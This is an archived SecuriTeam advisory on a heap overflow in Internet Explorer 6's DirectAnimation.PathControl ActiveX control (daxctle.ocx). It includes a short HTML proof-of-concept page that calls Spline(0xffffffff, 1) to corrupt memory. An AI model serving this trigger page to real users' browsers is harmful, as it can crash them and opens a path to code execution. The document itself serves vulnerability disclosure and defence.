[NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Microsoft Internet Explorer daxctle.ocx Heap Overflow
------------------------------------------------------------------------


SUMMARY

Microsoft Internet Explorer is vulnerable to an heap overflow attack when
it handles a DirectAnimation.PathControl COM object.

DETAILS

Vulnerable Systems:
* Windows 2000/XP/2003 Internet Explorer 6.0 SP1

When Internet Explorer handle DirectAnimation.PathControl COM
object(daxctle.ocx) \ Spline method, Set the first parameter to 0xffffffff
will triggers an invalid memory \ write, That an attacker may DoS and
possibly could execute arbitrary code.

Exploit:
<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx

--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject("DirectAnimation.PathControl");

target.Spline(0xffffffff, 1);

</script>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:nop@xxxxxxxx> nop.
The original article can be found at:
<http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19>
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] Buffer Overflow in GOCR
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GOCR - open-source character recognition software is vulnerable to buffer ... An integer overflow leading to heap overflow, ... This vulnerability ...
    (Securiteam)
  • [NT] Internet Explorer Compressed Content URL Heap Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is an heap overflow vulnerability discovered in Internet Explorer ... Internet Explorer 6 SP1 with the MS06-042 patch applied are vulnerable. ...
    (Securiteam)
  • [NT] Comodo DLL Injection via Weak Hash Function Exploitation Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Comodo DLL Injection via Weak Hash Function Exploitation Vulnerability ... register unsigned long crc; ... This program assumes that Internet Explorer is a privileged application ...
    (Securiteam)
  • [NT] Microsoft Internet Explorer Property Memory Corruption Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer Property Memory Corruption Vulnerability ...
    (Securiteam)
  • [NT] Microsoft License Manager and urlmon.dll COM Object Interaction Invalid Memory Access Vulnerabi
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer is "a set of core technologies in Microsoft Windows ... exploitation of an invalid memory access vulnerability in various ... COM objects may allow an attacker to execute arbitrary code. ...
    (Securiteam)